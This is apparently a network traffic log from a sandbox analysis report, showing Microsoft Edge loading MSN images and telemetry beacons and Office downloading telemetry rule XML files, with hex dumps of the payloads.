2024-11-11 09:33:23 UTC	1218	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 71 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 35 2d 63 30 31 34 20 37 39 2e 31 35 31 34 38 31 2c 20 32 30 31 33 2f 30 33 2f 31 33 2d 31 32 3a 30 39 3a 31 35 20 20 Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<qiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49810	23.44.133.12	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	634	OUT	GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:23 UTC	516	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1lFz6G Last-Modified: Sun, 10 Nov 2024 06:14:35 GMT X-Source-Length: 5699 X-Datacenter: eastap X-ActivityId: 96a315e5-981f-47e5-bbfa-17d63c15ba44 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Length: 5699 Cache-Control: public, max-age=333657 Expires: Fri, 15 Nov 2024 06:14:20 GMT Date: Mon, 11 Nov 2024 09:33:23 GMT Connection: close
2024-11-11 09:33:23 UTC	5699	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 84 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 05 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 4a 01 1b 00 05 00 00 00 01 00 00 00 52 01 28 00 03 00 00 00 01 00 02 00 00 87 69 00 04 00 00 00 01 00 00 00 5a 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 00 32 a0 03 00 04 00 00 00 01 00 00 00 32 00 00 00 00 86 f1 c2 a8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 Data Ascii: PNGIHDR22?gAMAa cHRMz&u0`:pQ<eXIfMM*JR(iZHH22pHYs

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49811	23.44.133.12	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	634	OUT	GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:23 UTC	516	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Wed, 16 Oct 2024 13:27:27 GMT X-Datacenter: westus X-ActivityId: e052a22a-abc6-4901-8eb3-22f69d832642 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Type: image/png Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1hk7Sh X-Source-Length: 6962 Content-Length: 6962 Cache-Control: public, max-age=143690 Expires: Wed, 13 Nov 2024 01:28:13 GMT Date: Mon, 11 Nov 2024 09:33:23 GMT Connection: close
2024-11-11 09:33:23 UTC	6962	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 0c 3f 69 43 43 50 49 43 43 20 50 72 6f 66 69 6c 65 00 00 48 89 95 57 07 58 53 c9 16 9e 5b 92 90 90 84 12 40 40 4a e8 4d 10 a9 01 a4 84 d0 42 ef 08 36 42 12 20 94 18 03 41 c5 8e 2e 2a b8 76 b1 80 0d 5d 15 51 b0 02 62 47 ec 2c 8a bd 2f 16 54 94 75 b1 60 57 de a4 80 ae fb ca f7 e6 fb e6 ce 7f ff 39 f3 9f 33 e7 ce dc 7b 07 00 8d e3 3c 89 24 0f d5 04 20 5f 5c 28 8d 0f 0d 64 8e 4a 4d 63 92 9e 02 0c d0 01 15 38 01 4b 1e bf 40 c2 8e 8d 8d 04 b0 0c b4 7f 2f ef ae 03 44 de 5e 71 94 6b fd b3 ff bf 16 2d 81 b0 80 0f 00 12 0b 71 86 a0 80 9f 0f f1 7e 00 f0 2a be 44 5a 08 00 51 ce 5b 4c 2a 94 c8 31 ac 40 47 0a 03 84 78 be 1c 67 29 71 95 1c 67 28 f1 6e 85 4d 62 3c 07 Data Ascii: PNGIHDR22??iCCPICC ProfileHWXS[@@JMB6B A.v]QbG,/Tu`W93{<$ _\(dJMc8K@/D^qk-q~DZQ[L*1@Gxg)qg(nMb<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49809	20.110.205.119	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	1271	OUT	GET /c.gif?rnd=1731317601819&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=cab479153b874b3da039ff0032aa1e4d&activityId=cab479153b874b3da039ff0032aa1e4d&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=273F2475F82C4386958D625ABD0712E0&MUID=18874E57A98C67C518B55B63A89566FE HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=18874E57A98C67C518B55B63A89566FE; _EDGE_S=F=1&SID=143A1788354267EB0AE802BC343E6686; _EDGE_V=1; SM=T
2024-11-11 09:33:24 UTC	983	IN	HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Content-Type: image/gif Last-Modified: Wed, 16 Oct 2024 16:24:13 GMT Accept-Ranges: bytes ETag: "8d3dafd6e71fdb1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure; Set-Cookie: MUID=18874E57A98C67C518B55B63A89566FE; domain=.msn.com; expires=Sat, 06-Dec-2025 09:33:24 GMT; path=/; SameSite=None; Secure; Priority=High; Set-Cookie: SRM_M=18874E57A98C67C518B55B63A89566FE; domain=c.msn.com; expires=Sat, 06-Dec-2025 09:33:24 GMT; path=/; SameSite=None; Secure; Set-Cookie: MR=0; domain=c.msn.com; expires=Mon, 18-Nov-2024 09:33:24 GMT; path=/; SameSite=None; Secure; Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Mon, 11-Nov-2024 09:43:24 GMT; path=/; SameSite=None; Secure; Date: Mon, 11 Nov 2024 09:33:23 GMT Connection: close Content-Length: 42
2024-11-11 09:33:24 UTC	42	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b Data Ascii: GIF89a!,L;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49805	20.50.73.10	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	1082	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731317601817&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 3765 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=18874E57A98C67C518B55B63A89566FE; _EDGE_S=F=1&SID=143A1788354267EB0AE802BC343E6686; _EDGE_V=1
2024-11-11 09:33:23 UTC	3765	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 31 31 54 30 39 3a 33 33 3a 32 31 2e 38 31 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 30 62 66 63 61 64 37 2d 33 65 30 63 2d 34 34 37 33 2d 38 32 61 35 2d 31 36 32 32 37 34 39 62 39 39 37 31 22 2c 22 65 70 6f 63 68 22 3a 22 34 32 39 32 38 33 34 35 39 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-11-11T09:33:21.813Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"c0bfcad7-3e0c-4473-82a5-1622749b9971","epoch":"4292834591"},"app":{"locale
2024-11-11 09:33:24 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=d875e7bfbcaf4732a060ba50cd598ad0&HASH=d875&LV=202411&V=4&LU=1731317604095; Domain=.microsoft.com; Expires=Tue, 11 Nov 2025 09:33:24 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=7b81efd799a34ddd8b63b86eb1850384; Domain=.microsoft.com; Expires=Mon, 11 Nov 2024 10:03:24 GMT; Path=/;Secure; SameSite=None time-delta-millis: 2278 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Mon, 11 Nov 2024 09:33:23 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49815	23.44.133.12	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:24 UTC	634	OUT	GET /tenant/amp/entityid/AA1t99ka.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:24 UTC	518	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1t99ka Last-Modified: Fri, 01 Nov 2024 18:01:14 GMT X-Source-Length: 20811 X-Datacenter: eastus X-ActivityId: ee99dc34-c4cc-40d2-beb4-909b60878009 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 20811 Cache-Control: public, max-age=376219 Expires: Fri, 15 Nov 2024 18:03:43 GMT Date: Mon, 11 Nov 2024 09:33:24 GMT Connection: close
2024-11-11 09:33:24 UTC	15866	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 90 00 00 01 90 08 02 00 00 00 0f dd a1 9b 00 00 0c 3e 69 43 43 50 49 43 43 20 50 72 6f 66 69 6c 65 00 00 48 89 95 57 07 58 53 c9 16 9e 5b 92 90 90 10 20 80 80 94 d0 9b 20 22 25 80 94 10 5a 00 e9 45 b0 11 92 00 a1 c4 18 08 2a 76 74 51 c1 b5 8b 08 d8 d0 55 11 c5 0e 88 1d b1 b3 28 f6 be 58 50 50 d6 c5 82 5d 79 93 02 ba ee 2b df 9b 7c 33 f3 e7 9f 33 ff 39 73 ee dc 32 00 d0 4f f0 24 92 1c 54 13 80 5c 71 be 34 36 24 80 39 26 39 85 49 ea 02 28 a0 c2 df 50 40 e7 f1 f3 24 ec e8 e8 08 00 cb 40 ff f7 f2 ee 06 40 e4 fd 55 47 b9 d6 3f c7 ff 6b d1 12 08 f3 f8 00 20 d1 10 a7 09 f2 f8 b9 10 1f 00 00 af e2 4b a4 f9 00 10 e5 bc c5 94 7c 89 1c c3 0a 74 a4 30 40 88 17 ca 71 86 12 57 c9 71 9a 12 ef 51 d8 c4 c7 72 20 6e Data Ascii: PNGIHDR>iCCPICC ProfileHWXS[ "%ZE*vtQU(XPP]y+\|339s2O$T\q46$9&9I(P@$@@UG?k K\|t0@qWqQr n
2024-11-11 09:33:24 UTC	4945	IN	Data Raw: 3d f7 52 13 58 62 fb e9 21 5b 75 03 17 1c 54 6d 19 c9 a8 68 28 42 9d 72 18 59 2e 37 2a 0c 62 39 95 49 f4 d3 4f 3f dd 5c 95 c7 7f 5e 26 47 55 66 a3 ea 36 56 f1 51 09 75 c5 13 0a 63 96 51 3e 61 c6 4e 30 31 02 fb 25 ac ba ef f1 51 a3 42 71 d6 c4 60 4d d0 b4 22 a3 45 5b 46 7d 48 2d fb 24 ab b3 11 2c 12 46 4c d6 28 60 28 2f fd 89 ad 4e 3b ed b4 70 0a 37 30 5d 55 33 e8 8b ab f4 61 23 b0 4f 04 f6 4b 58 2e 2f c8 4a 25 4c 43 94 67 ef b3 5a 9d fd c0 11 18 09 68 2c 3c 41 d3 0e 86 ab 53 52 ba 3f f9 a6 85 af a7 7b ea 87 ad bc 55 63 45 55 e2 a9 dc ba b0 55 85 57 e3 55 5a 6e 04 0e 04 81 03 20 ac 72 d0 12 0e a4 66 5d c8 c1 22 50 bc b3 28 36 fa d0 96 53 95 ac 04 4a 67 05 4d 1e e7 99 a2 fa ae ef fa 2e 2f d3 58 05 2a c8 0a 49 b9 63 89 ac 13 61 49 46 40 5b 8b 77 92 17 17 ed Data Ascii: =RXb![uTmh(BrY.7b9IO?\^&GUf6VQucQ>aN01%QBq`M"E[F}H-$,FL(`(/N;p70]U3a#OKX./J%LCgZh,<ASR?{UcEUUWUZn rf]"P(6SJgM./XIcaIF@[w

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.5	49816	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:24 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:24 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:24 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: 31c5dc94-101e-008d-18d5-3392e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093324Z-174f7845968ljs8phC1EWRe6en00000004p00000000023my x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:24 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.5	49817	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:24 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:24 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:24 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: 8377dd30-c01e-00a1-3ad5-337e4a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093324Z-174f7845968cpnpfhC1EWR3afc00000004a0000000007gc2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:24 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.5	49818	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:24 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:24 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:24 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: 5f09de9a-701e-0050-70d5-336767000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093324Z-174f7845968qj8jrhC1EWRh41s00000004qg000000003t30 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:24 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.5	49820	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:24 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:24 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:24 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: 5d78e2d9-801e-00a0-72d5-332196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093324Z-174f78459685m244hC1EWRgp2c00000004h000000000764y x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:24 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.5	49819	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
